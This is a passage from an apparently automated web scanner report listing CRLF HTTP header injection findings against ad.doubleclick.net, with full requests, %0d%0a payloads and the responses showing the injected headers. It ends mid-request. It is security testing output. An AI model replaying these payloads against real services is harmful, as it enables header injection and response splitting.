GET /2131e%0d%0ad48759716a3/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2131e
d48759716a3
/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 11 May 2011 15:55:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.9. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b9ce%0d%0a23b68d3f485 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b9ce%0d%0a23b68d3f485/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b9ce
23b68d3f485
/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 11 May 2011 15:49:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.10. http://ad.doubleclick.net/adi/N5685.127408.8193638746421/B5509356.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5685.127408.8193638746421/B5509356.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88c3d%0d%0a683e3039507 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88c3d%0d%0a683e3039507/N5685.127408.8193638746421/B5509356.2;sz=720x300;click=http://xads.zedo.com/ads2/c?a=945899%3Bx=3840%3Bg=0,0%3Bc=305005344,305005344%3Bi=0%3Bn=305%3Bs=510%3Bs%3D510%3Bg%3D172%3Bm%3D34%3Bw%3D51%3Bu%3D5ajh4goBADQAAFjiiCYAAABN%7E042311%3Bi%3D0%3B%3Bp%3D8%3Bf%3D1064645%3Bh%3D478907%3Bo%3D20%3By%3D43%3Bv%3D1%3Bt%3Di%3Bk%3D;ord=0.18052171799354255? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html?a=s%3D510%3Bg%3D172%3Bm%3D34%3Bw%3D51%3Bu%3D5ajh4goBADQAAFjiiCYAAABN~042311%3Bi%3D0%3B;l=;p=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/88c3d
683e3039507
/N5685.127408.8193638746421/B5509356.2;sz=720x300;click=http: //xads.zedo.com/ads2/c
Date: Wed, 11 May 2011 15:55:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.11. http://ad.doubleclick.net/adi/N6374.137661.GLAM/B5287030.20 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6374.137661.GLAM/B5287030.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 90f7b%0d%0aee1b9f9aee6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /90f7b%0d%0aee1b9f9aee6/N6374.137661.GLAM/B5287030.20;sz=728x90;click=http://www30a2.glam.com/gad/click.act?0398-_urlenc%3D1-_gclickid%3Dgaclk4dcaa38ad318e-_advid%3D1558709-_adid%3D5000036843-_crid%3D500030404-_aipid%3D201105110744-_ge_%3D1%5E2%5E93fdbc0dbf9bc64cacead45e3ad7714f1-ord%3D3352542438078671.5-afid%3D8156650-dsid%3D443996-sz%3D728x90-zone%3D%2F-sid%3D116391130334874196611-tile%3D1-seq%3D1-tt%3Dj-atf%3D1-url%3D0pz6wp-flg%3D64-u%3Db003186fb7p1r3itjk9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dcaa38ad318e;ord=4dcaa38ad101b? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/90f7b
ee1b9f9aee6
/N6374.137661.GLAM/B5287030.20;sz=728x90;click=http: //www30a2.glam.com/gad/click.act
Date: Wed, 11 May 2011 15:00:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.12. http://ad.doubleclick.net/adi/sugar.tres/gallery [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/sugar.tres/gallery

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f045%0d%0a37330335a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f045%0d%0a37330335a4/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9f045
37330335a4
/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966:
Date: Wed, 11 May 2011 14:58:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.13. http://ad.doubleclick.net/adj/N2434.access/B5401633 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2434.access/B5401633

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8f832%0d%0af1f0aa25cbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8f832%0d%0af1f0aa25cbc/N2434.access/B5401633;sz=300x250;ord=2649916536391779493?;click=http://r.turn.com/r/tpclick/id/pcQQzAxlxiRQbQ4A_QEBAA/3c/http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DJ2YAADdmAADuUQAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=121&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8f832
f1f0aa25cbc
/N2434.access/B5401633;sz=300x250;ord=2649916536391779493:
Date: Wed, 11 May 2011 15:29:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.14. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c3a0%0d%0a6f37dca43bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c3a0%0d%0a6f37dca43bf/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c3a0
6f37dca43bf
/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892^884211^1183^0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64
Date: Wed, 11 May 2011 15:31:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.15. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 553f0%0d%0af1c17da499d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /553f0%0d%0af1c17da499d/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/553f0
f1c17da499d
/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517^884214^1236^0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64
Date: Wed, 11 May 2011 15:10:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.16. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b1e7%0d%0ad409f8817d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b1e7%0d%0ad409f8817d9/N4270.Media6Degrees.com/B5279322.3;sz=300x250;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17303119061836836|cId=5805|cb=1305127887|notifyPort=8080|exId=22|tId=17303119061836836|ec=1|secId=396|price=1.8300|pubId=526|advId=891|notifyServer=asd133.sd.pl.pvt|spId=32352|adType=ad|invId=2276|bid=1.83|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADuUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=;ord=1305127888734 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b1e7
d409f8817d9
/N4270.Media6Degrees.com/B5279322.3;sz=300x250;pc=[TPAS_ID];click0=http: //ad.media6degrees.com/adserv/clk
Date: Wed, 11 May 2011 16:06:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.17. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84906%0d%0a2503fb53c0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84906%0d%0a2503fb53c0a/N4518.z2i/B5479389.3;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84906
2503fb53c0a
/N4518.z2i/B5479389.3;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:52:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.18. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b637%0d%0ae85ff9dd1ca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b637%0d%0ae85ff9dd1ca/N4518.z2i/B5479389.4;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b637
e85ff9dd1ca
/N4518.z2i/B5479389.4;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:53:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.19. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4518.z2i/B5479389.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5b67c%0d%0a3e73b45c2b7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5b67c%0d%0a3e73b45c2b7/N4518.z2i/B5479389.7;sz=270x100;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5b67c
3e73b45c2b7
/N4518.z2i/B5479389.7;sz=270x100;ord=[timestamp]:
Date: Wed, 11 May 2011 15:52:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.20. http://ad.doubleclick.net/adj/N5687.135388.BIZO/B5483330 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5687.135388.BIZO/B5483330

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24767%0d%0a0e872898a45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24767%0d%0a0e872898a45/N5687.135388.BIZO/B5483330;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/275/%2a/c%3B240571887%3B0-0%3B0%3B63465864%3B4307-300/250%3B41950541/41968328/1%3Bu%3D%2Cbzo-19844286_1305125992%2C11f8f328940989e%2CMiscellaneous%2Cbzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1%3B~sscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=5309408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d